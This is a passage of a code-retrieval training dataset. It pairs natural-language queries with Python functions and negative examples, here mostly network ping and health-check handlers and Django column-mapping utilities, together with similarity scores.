logging.info(\"OK\")\n return True\n logging.error(\"FAILED\")\n return False", "async def ping(request):\n return web.json_response({'ping': 'pong'})", "def test_ping(self):\n response = self.app.get('/ping')\n\n assert response.status_code == 200\n assert response.data == b\"pong\"", "def ping(event, context):\n logger.info(\"Ping requested.\")\n return _get_response(200, \"PONG!\")", "def ping():\n return json_response({\n 'ping': 'pong',\n 'version': __version__,\n 'imgapi': False,\n })", "def sendPing(self, payload=None):", "def ping(self):\n self._write(f'PING :{self.server.name}')\n self.awaiting_pong_since = datetime.datetime.now()", "def ping(self):\n\n rlog(1, self.name, 'sending ping')\n try:\n self.putonqueue(1, 'PING :%s' % self.server)\n return 1\n except Exception, ex:\n rlog(10, self.name, \"can't send ping: %s\" % str(ex))\n return 0", "def ping(self):\n try:\n api_ping = '{}://{}:{}/api/1.0.0/ping/{}/None'.format(\n self._env.api_protocol,\n self._env.api_host,\n self._env.api_port,\n self._key\n )\n self._env.logger.info('PING> {}'.format(api_ping))\n\n def check(response):\n if response.code == 204:\n self._env.logger.info('204 - Registering new routes')\n self.register_routes()\n elif response.code == 404:\n self._env.logger.info('404 - api gateway is not available')\n elif response.code != 200:\n self._env.logger.error('{} - UNKNOWN ERROR'.format(response.code))\n return response\n\n def log(failure):\n \"\"\"\n Just log the error, a return code of 'False' will be returned elsewhere\n :param failure: A treq failure object\n \"\"\"\n return self._env.logger.warning('[ping] {}'.format(failure.getErrorMessage()))\n\n treq.get(api_ping).addCallback(check).addErrback(log)\n\n except requests.exceptions.ConnectionError as e:\n self._env.logger.warning('ping failed for \"{}\"'.format(api_ping))\n self._env.logger.warning('ping return = \"{}\"'.format(e.args[0].reason))\n self._state = False", "def ping(self):\n pass", "def ping():\r\n health1 = ScoringService.get_model1() is not None # You can insert a health check here\r\n ping_response = \"Docker for Discover non prime users\"\r\n status = 200 if (health1) else 404\r\n return flask.Response(response=ping_response, status=status, mimetype='application/json')", "def ping(self):\n\n url = self.api_url('ping')\n\n return requests.get(url, headers=self.auth_header).json()", "def ping(request: Request):\n client_host = request.client.host\n return {\"payload\": \"Hello, v1.0.1\", \"client\": client_host}", "def ping(self):\n return (200 == self.client.head(self.name).getStatusCode())", "def adc_api_ping():\n return jsonify({\"status\": \"OK\"})", "def serve_response(self):\n try:\n print self.path\n response_info = self.responses_qeues[self.path.split(\"?\").pop(0)].pop(0)\n print response_info\n except:\n self.send_response(404)\n self.end_headers()\n return\n\n \"\"\"If response_info has also a delay set, wait the time specified.\"\"\"\n if \"delay\" in response_info:\n time.sleep(response_info[\"delay\"])\n\n \"\"\"Send the status code.\"\"\"\n status_code = response_info[\"status_code\"]\n self.send_response(status_code)\n\n \"\"\"Send specific headers, if any.\"\"\"\n if \"headers\" in response_info:\n headers = response_info[\"headers\"]\n for header_name in headers.keys():\n self.send_header(header_name, headers.get(header_name))\n self.end_headers()\n\n \"\"\"Send the body, if any.\"\"\"\n if \"body\" in response_info:\n body = response_info[\"body\"]\n self.wfile.write(json.dumps(body))", "def onPing(self, payload):", "async def do_ping(self):\n return self._result(\"pong\")", "def ping(self) -> None:\n ...", "def ping(self):\n return", "def ping(self):\n\t\treturn self._send_command_to_entity_server(us.SERVER_COMMAND_PING)", "def ping():\n return '{}'", "def Ping(self):\n\n self.helpers(self.config).Info(\"Ping Weaviate...\")\n # get the meta endpoint\n _, _ = self.Get(\"/meta\")\n # would fail is not available.\n self.helpers(self.config).Info(\"Pong from Weaviate...\")", "def server_ping(self):\n \n if not hasattr(self,\"ping_data\"):\n #need to include a list called ping_data - which is updated as needed. by \"ping_data fnctions in objects of the server.\n #Nmaely this includes a list of instruments that are attached to the server.\n self.ping_data={\"server_id\":self.id,\n \"server_name\":self.name,\n \"server_ip\":self.ip,\n \"server_port\":str(wsport),\n \"server_id_node\":self.id_node,\n \"server_ping\":\"ping!\"}\n self.ping_data.update({\"server_time\":time.time()})\n self.multicast.protocol.send(simplejson.dumps(self.ping_data))\n server_command = commands.ServerCommand(self.server, self.server_ping)\n reactor.callLater(self.server_ping_period,\n self.command_queue.add,\n server_command)", "def ping() -> str:\n return \"Server is here\"", "def do_GET(self):\n if not self.path.endswith(\"/\"): self.path += \"/\"\n if self.path == \"/ping/\":\n msg = \"pong\".encode(\"UTF-8\")\n\n self.send_response(HTTPStatus.OK)\n self.send_header(\"Content-Type\", \"text/application\")\n self.send_header(\"Content-Length\", len(msg))\n self.end_headers()\n self.wfile.write(msg)\n else:\n self.send_response(HTTPStatus.BAD_REQUEST)\n self.end_headers()", "def send_pings(self, interval):\n for client in list(self.clients.values()):\n t = client._transport\n if client.ident.registered:\n since = client.awaiting_pong_since\n if not since:\n client.ping()\n else:\n self.check_timeout(t, since, interval, 'Ping timeout')\n else:\n self.check_timeout(t, client.connected_at, interval, 'Connection timed out')", "def ping(self,dest):\n\t\tself.tn.write('ping -c 4 %s\\n'%(dest))\n\t\tself.tn.write('exit\\n')\n\t\tresp = self.tn.read_all()\n\t\treturn resp", "async def ping(self, *args, **kwargs):\n\n return await self._makeApiCall(self.funcinfo[\"ping\"], *args, **kwargs)", "def Ping(self): # real signature unknown; restored from __doc__\n pass", "def Ping(self, request, _):\n\n return notifier_pb2.PingReply(data=request.data)", "def test_ping(self):\n response = self.client.get(reverse(\"api_hello:ping\"))\n self.assertTrue(response.json()[\"status\"])", "def send_ping(self, seq_num):\n # Create a client socket, bind to random port, and set timeout of sock\n client_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n rand_port = random.randint(1024, 65535)\n host = socket.gethostbyname(socket.gethostname())\n client_sock.bind((host, rand_port))\n client_sock.settimeout(self.timeout)\n\n # If first request, print relevant message\n if seq_num == 1:\n print(f'PING {self.server_ip}')\n # Try - send ping request to server\n try:\n # build request message\n request_msg = self.build_message(seq_num)\n\n # Mark start time for calculating request message rtt (ms)\n start_time = time.time() * 1000\n # Send echo request message to server and receive any reply\n client_sock.sendto(request_msg, (self.server_ip, self.server_port))\n data, address = client_sock.recvfrom(2048)\n # Mark end time for calculating rtt (ms)\n end_time = time.time() * 1000\n\n # Add rtt to list of rtts\n rtt = int(end_time - start_time)\n self.rtt_list.append(rtt)\n # Increment request count since transmitted another message\n self.request_count += 1\n\n # Calculate checksum from server\n server_checksum = self.calculate_checksum(data)\n # Grab sequence number from reply message\n server_seq_num = int.from_bytes(data[6:8], byteorder='big')\n\n # If checksum from server reply is invalid, print error message\n # (invalid if sum of headers not = 65535 (all 1's in binary))\n if server_checksum != 65535:\n print(f'WARNING: checksum verification failure for echo reply '\n f'seqno={str(server_seq_num)}')\n # Otherwise print PONG\n else:\n print(f'PONG {self.server_ip}: seq={str(server_seq_num)} '\n f'time={rtt} ms')\n # Successfully received a reply\n self.reply_count += 1\n client_sock.close()\n\n # If have timeout exception, count as dropped\n except socket.timeout:\n self.request_count += 1\n client_sock.close()", "def rpc_ping(self):\n\t\treturn True", "def ping(self) -> bool:\n # consider 200 to be successful\n response = self.shards_response(\"ping\")\n return response.status_code == 200", "def ping():\n health = (\n ScoringService.get_predictor_model() is not None\n ) # You can insert a health check here\n\n status = 200 if health else 404\n return flask.Response(response=\"\\n\", status=status, mimetype=\"application/json\")", "def test_api_ping_success(self):\r\n res = self.testapp.get('/api/v1/admin/ping?api_key=' + API_KEY,\r\n status=200)\r\n ping = json.loads(res.body)\r\n\r\n self.assertTrue(ping['success'])\r\n\r\n self._check_cors_headers(res)", "async def handle_ping(request):\n return web.Response(text=f\"OK {datetime.now().isoformat()}\\n\", headers={'Content-Type': 'text/event-stream'})", "def ping(self,\n *opts, # type: PingOptions\n **kwargs # type: Any\n ) -> PingResult:\n return super().ping(*opts, **kwargs)", "def handle_ping(self, host):\n self.send(\"PONG :{}\".format(host))", "def ping(self, *args):\n return self._command(b'PING', *args, handler=\"PONG\")", "def get(self):\n resp = jsonify({\"response\": 'Pong!'})\n return resp", "def ping(self):\n return rpc.ping(self.service, self.session_handle)", "async def ping(self, ctx):\n await ctx.send('pong')", "def ping_view(request, pk):\n service = get_object_or_404(ServiceModel, pk=pk)\n service.ping(force_ping=True)\n return redirect(reverse('services:index'))", "async def ping(self,\n wait_for_response=True,\n reset_inactivity_timeout=True,\n response_timeout_in_seconds=None):\n command = _create_ping_command(self._get_and_increment_command_sequence_number(),\n wait_for_response=wait_for_response,\n reset_inactivity_timeout=reset_inactivity_timeout)\n\n await self._send_command(command,\n response_timeout_in_seconds)", "def ping(self):\n return True", "def ping(self):\n return True", "def ping(self):\n packet = Packet()\n packet.message = MessageType.CLIENT_PING\n packet.data = \"PING\"\n try:\n self.send(packet.encode())\n self.last_ping_time = time.time()\n except socket.error, e:\n self.console.error(repr(e))", "def ping(self):\n return self.hub.ping()", "def ping(request):\r\n rdict = request.matchdict\r\n params = request.params\r\n username = rdict.get('username', None)\r\n api_key = params.get('api_key', None)\r\n user = UserMgr.get(username=username)\r\n # Check if user provided the correct api_key\r\n if api_key == user.api_key:\r\n return _api_response(request, {\r\n 'success': True,\r\n 'message': 'Looks good'\r\n })\r\n else:\r\n return _api_response(request, {\r\n 'success': False,\r\n 'message': 'API key is invalid.'\r\n })", "def respond(self, resp):\n self.push(resp + '\\r\\n')\n self.logline('==> %s' % resp)", "async def rpc_ping(self, request: dht_pb2.PingRequest, context: P2PContext) -> dht_pb2.PingResponse:\n\n response = dht_pb2.PingResponse(peer=self.node_info, dht_time=get_dht_time(), available=False)\n\n if request.peer and request.peer.node_id:\n sender_id = DHTID.from_bytes(request.peer.node_id)\n sender_peer_id = context.remote_id\n\n if request.validate:\n response.available = await self.call_ping(sender_peer_id, validate=False) == sender_id\n\n asyncio.create_task(\n self.update_routing_table(\n sender_id, sender_peer_id, responded=response.available or not request.validate\n )\n )\n\n return response", "def ping(self):\n if not self.proxy:\n self.proxy = self.session.service(\"ALExpressiveListening\")\n return self.proxy.ping()", "def ping(self):\n return 'ping'", "def sendPing(server):\n server_status = None\n \n # build the url\n url = 'http://{0}'.format(server)\n # send the ping via HTTP\n try:\n health = requests.get(url)\n except requests.ConnectionError:\n return 'Offline'\n # depending on the health of the system, respond accordingly\n if health.ok:\n server_status = 'Online'\n else:\n server_status = 'Offline'\n \n return server_status", "def _send_pong(self):\r\n self._send(\"PONG\")", "def test_ping(self):\r\n\r\n # Access the service status page, which starts a delayed\r\n # asynchronous task\r\n response = self.client.get(self.ping_url)\r\n\r\n # HTTP response should be successful\r\n self.assertEqual(response.status_code, 200)\r\n\r\n # Expect to get a JSON-serialized dict with\r\n # task and time information\r\n result_dict = json.loads(response.content)\r\n\r\n # Was it successful?\r\n self.assertTrue(result_dict['success'])\r\n\r\n # We should get a \"pong\" message back\r\n self.assertEqual(result_dict['value'], \"pong\")\r\n\r\n # We don't know the other dict values exactly,\r\n # but we can assert that they take the right form\r\n self.assertIsInstance(result_dict['task_id'], unicode)\r\n self.assertIsInstance(result_dict['time'], float)\r\n self.assertTrue(result_dict['time'] > 0.0)", "def get(self):\n\n # Return a plain text response\n return self.plain_text_response(\"Alive!\", 200)", "async def ping(self, ctx : commands.Context) -> None:\n\n embed = Embed(\n title = \"🏓 Pong!\",\n description = f\"Gateway latency is {int(round(self.bot.latency * 1000, 2))}ms.\",\n color = maincolor\n )\n await ctx.send(embed = embed)", "def ping(self, handler=\"admin/ping\", **kwargs):\n params = kwargs\n params_encoded = safe_urlencode(params, True)\n\n if len(params_encoded) < 1024:\n # Typical case.\n path = \"%s/?%s\" % (handler, params_encoded)\n return self._send_request(\"get\", path)\n else:\n # Handles very long queries by submitting as a POST.\n path = \"%s/\" % handler\n headers = {\n \"Content-type\": \"application/x-www-form-urlencoded; charset=utf-8\"\n }\n return self._send_request(\n \"post\", path, body=params_encoded, headers=headers\n )", "async def ping(self, ctx):\r\n embed = discord.Embed(\r\n title = \"Ping\",\r\n description = \"Pinging...\",\r\n color = Config.MAINCOLOR\r\n )\r\n t1 = time.perf_counter()\r\n msg = await ctx.send(embed = embed)\r\n t2 = time.perf_counter()\r\n embed = discord.Embed(\r\n title = \"🏓 Pong!\",\r\n description = f\"API latency is {round((t2 - t1) * 1000)}ms\\nHost latency is {round(self.bot.latency * 1000, 2)}ms\",\r\n color = Config.MAINCOLOR\r\n )\r\n await msg.edit(embed = embed)", "async def ping(self, ctx):\n self.log_command_call(\"ping\", ctx.message)\n embed_output = create_embed(description=\"pong\")\n await ctx.send(embed=embed_output)", "def test_ping(self):\n\n # Access the service status page, which starts a delayed\n # asynchronous task\n response = self.client.get(self.ping_url)\n\n # HTTP response should be successful\n assert response.status_code == 200\n\n # Expect to get a JSON-serialized dict with\n # task and time information\n result_dict = json.loads(response.content.decode('utf-8'))\n\n # Was it successful?\n assert result_dict['success']\n\n # We should get a \"pong\" message back\n assert result_dict['value'] == 'pong'\n\n # We don't know the other dict values exactly,\n # but we can assert that they take the right form\n assert isinstance(result_dict['task_id'], str)\n assert isinstance(result_dict['time'], float)\n assert result_dict['time'] > 0.0", "def ping():\n return 'pong'", "async def connections_send_ping(request: web.BaseRequest):\n context: AdminRequestContext = request[\"context\"]\n connection_id = request.match_info[\"conn_id\"]\n outbound_handler = request[\"outbound_message_router\"]\n body = await request.json()\n comment = body.get(\"comment\")\n\n try:\n async with context.profile.session() as session:\n connection = await ConnRecord.retrieve_by_id(session, connection_id)\n except StorageNotFoundError as err:\n raise web.HTTPNotFound(reason=err.roll_up) from err\n\n if not connection.is_ready:\n raise web.HTTPBadRequest(reason=f\"Connection {connection_id} not ready\")\n\n msg = Ping(comment=comment)\n await outbound_handler(msg, connection_id=connection_id)\n\n return web.json_response({\"thread_id\": msg._thread_id})", "def ping(self):\n return self._samp_hub.ping()", "def ping(self, cmd):\n cmd.finish(\"text='Present and (probably) well'\")", "async def ping(self, ctx:utils.Context):\r\n\r\n await ctx.send(\"Pong!\")", "def PingPong(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def PingPong(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def ping(self):\r\n start = time.time()\r\n response = self.get(\"ping\")\r\n duration = (time.time() - start) * 1000\r\n assert response == \"pong\"\r\n return duration", "async def ping(ctx):\n latencies = {\n \"websocket\": bot.latency,\n }\n\n def comp_message():\n msgs = []\n for title in latencies:\n msgs.append(f\"{title.title()}: {(latencies[title] * 1000):.0f}ms\")\n return '\\n'.join(msgs)\n\n start = time.perf_counter()\n await ctx.respond(comp_message())\n end = time.perf_counter()\n\n latencies[\"round trip\"] = end - start\n\n await ctx.edit(content=comp_message())", "async def ping(self, ctx):\n await ctx.send(\"Pong\")", "def run(self):\n for req, resp in self.servings:\n resp.check_timeout()", "def ping(self, cmd):\n\n cmd.finish(\"text='Present and (probably) well'\")", "def _ping_pando(self):\n try:\n requests.head('https://pando-rgw01.chpc.utah.edu/')\n except:\n print('🤝🏻⛔ Bad handshake with pando? Am I able to move on?')\n pass", "def ping():\n return json.loads('{\"message\": \"pong\", \"success\": true}')", "def send_resp(self):\n self.n_send_resp += 1", "def _send_and_response(self, addr, msg):\n self._namefixer(msg)\n return send_and_receive(addr, msg, 30) # manual timeout !!!!! fix it!" ]
[ "0.71649414", "0.7104726", "0.6999726", "0.69393915", "0.68687826", "0.67558753", "0.6743167", "0.6712012", "0.6712012", "0.6712012", "0.6712012", "0.6609778", "0.6493357", "0.6481408", "0.64656126", "0.63697636", "0.63491356", "0.634054", "0.6311246", "0.62131786", "0.6207986", "0.61707705", "0.61617047", "0.6136859", "0.61089426", "0.6092898", "0.6054629", "0.6032496", "0.6025239", "0.6021959", "0.59523267", "0.5924403", "0.58970237", "0.58842784", "0.5882918", "0.5872278", "0.5857753", "0.5850697", "0.5835816", "0.5832574", "0.58303183", "0.58257324", "0.5818586", "0.58169657", "0.57937187", "0.57918316", "0.57816637", "0.5769176", "0.57564133", "0.5753047", "0.5752077", "0.5740146", "0.57265323", "0.57241195", "0.57191336", "0.5710592", "0.5695972", "0.56933975", "0.56488246", "0.56402665", "0.5629598", "0.5612771", "0.56008875", "0.5594617", "0.5561108", "0.5552428", "0.55392337", "0.55206704", "0.55206704", "0.54881626", "0.5486906", "0.54852444", "0.5474517", "0.5473649", "0.54722583", "0.5471757", "0.547047", "0.5468718", "0.545422", "0.54269224", "0.5418201", "0.5412728", "0.5408598", "0.54030234", "0.539439", "0.53825605", "0.5364557", "0.53483653", "0.5342445", "0.5332628", "0.53278726", "0.53278726", "0.5318", "0.5313772", "0.5309468", "0.53079367", "0.5304919", "0.5304505", "0.5293093", "0.52909833", "0.52879846" ]
0.0
-1
Wrapper around the MappingColumns class to create the list of suggested mappings
def build_column_mapping(raw_columns, dest_columns, previous_mapping=None, map_args=None, default_mappings=None, thresh=0): return MappingColumns(raw_columns, dest_columns, previous_mapping=previous_mapping, map_args=map_args, default_mappings=default_mappings, threshold=thresh).final_mappings
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_column_mapping_suggestions(request):\n body = json.loads(request.body)\n import_file = ImportFile.objects.get(pk=body.get('import_file_id'))\n org_id = body.get('org_id')\n result = {'status': 'success'}\n # Make a dictionary of the column names and their respective types.\n # Build this dictionary from BEDES fields (the null organization columns,\n # and all of the column mappings that this organization has previously\n # saved.\n field_mappings = get_mappable_types()\n field_names = field_mappings.keys()\n column_types = {}\n for c in Column.objects.filter(\n Q(mapped_mappings__super_organization=org_id) |\n Q(organization__isnull=True)\n ).exclude(\n # mappings get created to mappable types\n # but we deal with them manually so don't\n # include them here\n column_name__in=field_names\n ):\n if c.unit:\n unit = c.unit.get_unit_type_display()\n else:\n unit = 'string'\n if c.schemas.first():\n schema = c.schemas.first().name\n else:\n schema = ''\n column_types[c.column_name] = {\n 'unit_type': unit.lower(),\n 'schema': schema,\n }\n\n building_columns = sorted(column_types.keys())\n db_columns = sorted(field_names)\n building_columns = db_columns + building_columns\n\n db_columns = get_mappable_types()\n for k, v in db_columns.items():\n db_columns[k] = {\n 'unit_type': v if v else 'string',\n 'schema': 'BEDES',\n }\n column_types.update(db_columns)\n\n suggested_mappings = mapper.build_column_mapping(\n import_file.first_row_columns,\n column_types.keys(),\n previous_mapping=get_column_mapping,\n map_args=[import_file.import_record.super_organization],\n thresh=20 # percentage match we require\n )\n\n for m in suggested_mappings:\n dest, conf = suggested_mappings[m]\n if dest is None:\n suggested_mappings[m][0] = u''\n\n result['suggested_column_mappings'] = suggested_mappings\n result['building_columns'] = building_columns\n result['building_column_types'] = column_types\n\n return result", "def __get_column_mapping(self):\n\n s1 = list(Sample(\"FL\", \"M1.0@265_Primary_ar115_s2010-08-06T06_36_00_e2010-08-06T18_24_00.csv\").get_data().columns)[:25]\n column_mapping = {}\n for i in range(len(s1)):\n column_mapping[i] = s1[i]\n\n return column_mapping", "def get_column_mappings(organization):\n column_mappings = ColumnMapping.objects.filter(\n super_organization=organization\n )\n mapping = {}\n for cm in column_mappings:\n # What in the world is this doings? -- explanation please\n if not cm.column_mapped.all().exists():\n continue\n\n key = cm.column_raw.all().values_list('table_name', 'column_name')\n value = cm.column_mapped.all().values_list('table_name', 'column_name')\n\n if len(key) != 1:\n raise Exception(\"There is either none or more than one mapping raw column\")\n\n if len(value) != 1:\n raise Exception(\"There is either none or more than one mapping dest column\")\n\n key = key[0]\n value = value[0]\n\n # These should be lists of one element each.\n mapping[key[1]] = value\n\n # _log.debug(\"Mappings from get_column_mappings is: {}\".format(mapping))\n return mapping, []", "def _get_columns_mapping_dict():\n\n columns_mapping_dict = {}\n for original_header in COLUMN_HEADERS_MAPPER:\n new_header = COLUMN_HEADERS_MAPPER[original_header]\n columns_mapping_dict[new_header] = [original_header]\n return columns_mapping_dict", "def label_columns(mapping):\n columns = []\n for name, column in mapping.items():\n columns.append(column.label(name))\n return columns", "def create_mappings(mappings, organization, user, import_file_id=None):\n\n # initialize a cache to store the mappings\n cache_column_mapping = []\n\n # Take the existing object and return the same object with the db column objects added to\n # the dictionary (to_column_object and from_column_object)\n mappings = Column._column_fields_to_columns(mappings, organization)\n for mapping in mappings:\n if isinstance(mapping, dict):\n try:\n column_mapping, _ = ColumnMapping.objects.get_or_create(\n super_organization=organization,\n column_raw__in=mapping['from_column_object'],\n )\n except ColumnMapping.MultipleObjectsReturned:\n _log.debug('ColumnMapping.MultipleObjectsReturned in create_mappings')\n # handle the special edge-case where remove dupes does not get\n # called by ``get_or_create``\n ColumnMapping.objects.filter(\n super_organization=organization,\n column_raw__in=mapping['from_column_object'],\n ).delete()\n\n column_mapping, _ = ColumnMapping.objects.get_or_create(\n super_organization=organization,\n column_raw__in=mapping['from_column_object'],\n )\n\n # Clear out the column_raw and column mapped relationships. -- NL really? history?\n column_mapping.column_raw.clear()\n column_mapping.column_mapped.clear()\n\n # Add all that we got back from the interface back in the M2M rel.\n [column_mapping.column_raw.add(raw_col) for raw_col in\n mapping['from_column_object']]\n if mapping['to_column_object'] is not None:\n [column_mapping.column_mapped.add(dest_col) for dest_col in\n mapping['to_column_object']]\n\n column_mapping.user = user\n column_mapping.save()\n\n cache_column_mapping.append(\n {\n 'from_field': mapping['from_field'],\n 'from_units': mapping.get('from_units'),\n 'to_field': mapping['to_field'],\n 'to_table_name': mapping['to_table_name'],\n }\n )\n else:\n raise TypeError(\"Mapping object needs to be of type dict\")\n\n # save off the cached mappings into the file id that was passed\n if import_file_id:\n from seed.models import ImportFile\n import_file = ImportFile.objects.get(id=import_file_id)\n import_file.save_cached_mapped_columns(cache_column_mapping)\n import_file.save()\n\n return True", "def get_column_mapping(raw_column, organization, attr_name='column_mapped'):\n from seed.utils.mapping import get_table_and_column_names\n\n if not isinstance(raw_column, list):\n column_raw = [raw_column]\n else:\n # NL 12/6/2016 - We should never get here, if we see this then find out why and remove the\n # list. Eventually delete this code.\n raise Exception(\"I am a LIST! Which makes no sense!\")\n\n # Should only return one column\n cols = Column.objects.filter(\n organization=organization, column_name__in=column_raw\n )\n\n try:\n previous_mapping = ColumnMapping.objects.get(\n super_organization=organization,\n column_raw__in=cols,\n )\n except ColumnMapping.MultipleObjectsReturned:\n _log.debug(\"ColumnMapping.MultipleObjectsReturned in get_column_mapping\")\n # handle the special edge-case where remove dupes does not get\n # called by ``get_or_create``\n ColumnMapping.objects.filter(super_organization=organization, column_raw__in=cols).delete()\n\n # Need to delete and then just allow for the system to re-attempt the match because\n # the old matches are no longer valid.\n return None\n except ColumnMapping.DoesNotExist:\n _log.debug(\"ColumnMapping.DoesNotExist\")\n return None\n\n column_names = get_table_and_column_names(previous_mapping, attr_name=attr_name)\n\n # Check if the mapping is a one-to-one mapping, that is, there is only one mapping available.\n # As far as I know, this should always be the case because of the MultipleObjectsReturned\n # from above.\n if previous_mapping.is_direct():\n column_names = column_names[0]\n else:\n # NL 12/2/2016 - Adding this here for now as a catch. If we get here, then we have problems.\n raise Exception(\"The mapping returned with not direct!\")\n\n return column_names[0], column_names[1], 100", "def __build_map(self):\n columns = []\n\n for i in range(self.__dimensions):\n columns.append([])\n\n for i in range(self.__dimensions):\n self.map.append(columns)", "def schema_mappings(self):\n pass", "def save_column_mappings(request):\n body = json.loads(request.body)\n import_file = ImportFile.objects.get(pk=body.get('import_file_id'))\n organization = import_file.import_record.super_organization\n mappings = body.get('mappings', [])\n for mapping in mappings:\n dest_field, raw_field = mapping\n if dest_field == '':\n dest_field = None\n\n dest_cols = _column_fields_to_columns(dest_field, organization)\n raw_cols = _column_fields_to_columns(raw_field, organization)\n try:\n column_mapping, created = ColumnMapping.objects.get_or_create(\n super_organization=organization,\n column_raw__in=raw_cols,\n )\n except ColumnMapping.MultipleObjectsReturned:\n # handle the special edge-case where remove dupes doesn't get\n # called by ``get_or_create``\n ColumnMapping.objects.filter(\n super_organization=organization,\n column_raw__in=raw_cols,\n ).delete()\n column_mapping, created = ColumnMapping.objects.get_or_create(\n super_organization=organization,\n column_raw__in=raw_cols,\n )\n\n # Clear out the column_raw and column mapped relationships.\n column_mapping.column_raw.clear()\n column_mapping.column_mapped.clear()\n\n # Add all that we got back from the interface back in the M2M rel.\n [column_mapping.column_raw.add(raw_col) for raw_col in raw_cols]\n if dest_cols is not None:\n [\n column_mapping.column_mapped.add(dest_col)\n for dest_col in dest_cols\n ]\n\n column_mapping.user = request.user\n column_mapping.save()\n\n return {'status': 'success'}", "def applyMapping(self):\n pass", "def _do_mapping(self):\n pass", "def create_deft_table_csv_mappings():\n mappings = list()\n mappings.append(CsvColumnMapping(columnName=\"rownumber\", cslDataType=\"int\", ordinal=0))\n mappings.append(CsvColumnMapping(columnName=\"rowguid\", cslDataType=\"string\", ordinal=1))\n mappings.append(CsvColumnMapping(columnName=\"xdouble\", cslDataType=\"real\", ordinal=2))\n mappings.append(CsvColumnMapping(columnName=\"xfloat\", cslDataType=\"real\", ordinal=3))\n mappings.append(CsvColumnMapping(columnName=\"xbool\", cslDataType=\"bool\", ordinal=4))\n mappings.append(CsvColumnMapping(columnName=\"xint16\", cslDataType=\"int\", ordinal=5))\n mappings.append(CsvColumnMapping(columnName=\"xint32\", cslDataType=\"int\", ordinal=6))\n mappings.append(CsvColumnMapping(columnName=\"xint64\", cslDataType=\"long\", ordinal=7))\n mappings.append(CsvColumnMapping(columnName=\"xuint8\", cslDataType=\"long\", ordinal=8))\n mappings.append(CsvColumnMapping(columnName=\"xuint16\", cslDataType=\"long\", ordinal=9))\n mappings.append(CsvColumnMapping(columnName=\"xuint32\", cslDataType=\"long\", ordinal=10))\n mappings.append(CsvColumnMapping(columnName=\"xuint64\", cslDataType=\"long\", ordinal=11))\n mappings.append(CsvColumnMapping(columnName=\"xdate\", cslDataType=\"datetime\", ordinal=12))\n mappings.append(CsvColumnMapping(columnName=\"xsmalltext\", cslDataType=\"string\", ordinal=13))\n mappings.append(CsvColumnMapping(columnName=\"xtext\", cslDataType=\"string\", ordinal=14))\n mappings.append(CsvColumnMapping(columnName=\"xnumberAsText\", cslDataType=\"string\", ordinal=15))\n mappings.append(CsvColumnMapping(columnName=\"xtime\", cslDataType=\"timespan\", ordinal=16))\n mappings.append(CsvColumnMapping(columnName=\"xtextWithNulls\", cslDataType=\"string\", ordinal=17))\n mappings.append(CsvColumnMapping(columnName=\"xdynamicWithNulls\", cslDataType=\"dynamic\", ordinal=18))\n return mappings", "def get_column_to_tags_mapping(\n self, config: cconfig.Config\n ) -> Optional[Dict[Any, List[str]]]:\n _ = self, config\n return None", "def columns(self) -> java.util.Collection:\n ...", "def requires_mapping(self):", "def __init__(self, columns=()):\n self.columns = list(columns)\n\n # Create internal dictionary for faster access\n self.column_dict = {}\n\n for column in self.columns:\n self.column_dict[column.column_id] = column", "def getColumnDictionary(self):\n try:\n column_dictionary = []\n con = self.getMetadataDatabaseConnection()\n column_values = con.cursor()\n con.cursor().callproc('qiime_assets.get_column_dictionary', [column_values])\n for row in column_values:\n # Skip if no column name is found\n if row[0] is None:\n continue\n\n # Some variables to allow for re-assignment should any of them be None\n column_name = row[0].lower()\n expected_values = row[1]\n description = row[2]\n data_type = row[3]\n max_length = row[4]\n min_length = row[5]\n active = row[6]\n \n if row[1] == None:\n expected_values == ''\n elif row[2] == None:\n description == ''\n elif row[3] == None:\n data_type = ''\n elif row[4] == None:\n max_length = ''\n elif row[5] == None:\n min_length = ''\n elif row[6] == None:\n min_length = ''\n \n list_item = (column_name, expected_values, description, data_type, max_length, min_length, active)\n column_dictionary.append(list_item)\n return column_dictionary\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), e)\n return False", "def mapping(self) -> Dict[str, str]:\n return self._normalizer.get_placeholders()", "def extract_mapping(self) -> DatasetMapping:\n # store fields\n fields = []\n for col in self.data.columns:\n #get field label\n label = col\n #get field type using PANDAS_TYPE (see apps.utils.utils)\n col_type = self.data[col].dtype\n field_type = PANDAS_TYPE[col_type]\n #set field\n field = FieldMapping(label=label, type=field_type)\n fields.append(field)\n self.mapping.append(label)\n return DatasetMapping(fields=fields)", "def itermappings(self):\r\n return self.by_target.iteritems()", "def get_special_mappings_df() -> pd.DataFrame:\n return pd.read_csv(SPECIAL_MAPPINGS_PATH, sep='\\t')", "def dimensionizing_mapper(self, names=None):\n\n def fix(string):\n tags = [\n \"'\", '\"', ' ', '&', '.', '/', '-',\n '(', ')', '[', ']', '{', '}'\n ]\n for tag in tags:\n string = string.replace(tag, '_')\n return string\n\n masks = self._meta['masks']\n columns = self._meta['columns']\n suffix = self._dimensions_suffix\n\n if not names: names = self.variables()\n mapper = {}\n for org_mn, mask in masks.items():\n if org_mn in names:\n mask_name = fix(org_mn)\n new_mask_name = '{mn}.{mn}{s}'.format(mn=mask_name, s=suffix)\n mapper[org_mn] = new_mask_name\n\n mask_mapper = 'masks@{mn}'.format(mn=org_mn)\n new_mask_mapper = 'masks@{nmn}'.format(nmn=new_mask_name)\n mapper[mask_mapper] = new_mask_mapper\n\n values_mapper = 'lib@values@{mn}'.format(mn=org_mn)\n new_values_mapper = 'lib@values@{nmn}'.format(nmn=new_mask_name)\n mapper[values_mapper] = new_values_mapper\n\n items = masks[org_mn]['items']\n for i, item in enumerate(items):\n org_cn = item['source'].split('@')[-1]\n col_name = fix(org_cn)\n new_col_name = '{mn}[{{{cn}}}].{mn}{s}'.format(\n mn=mask_name, cn=col_name, s=suffix\n )\n mapper[org_cn] = new_col_name\n\n col_mapper = 'columns@{cn}'.format(cn=org_cn)\n new_col_mapper = 'columns@{ncn}'.format(ncn=new_col_name)\n mapper[col_mapper] = new_col_mapper\n\n for col_name, col in columns.items():\n if col_name in names and not self._is_array_item(col_name):\n new_col_name = fix(col_name)\n if new_col_name == col_name: continue\n mapper[col_name] = new_col_name\n\n col_mapper = 